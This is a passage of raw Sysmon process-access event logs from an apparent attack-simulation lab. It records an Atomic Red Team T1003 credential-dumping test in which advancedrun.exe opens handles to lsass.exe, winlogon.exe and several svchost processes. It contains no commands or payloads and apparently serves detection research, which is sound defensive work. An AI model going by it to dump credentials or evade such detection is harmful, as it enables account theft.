\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003967367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
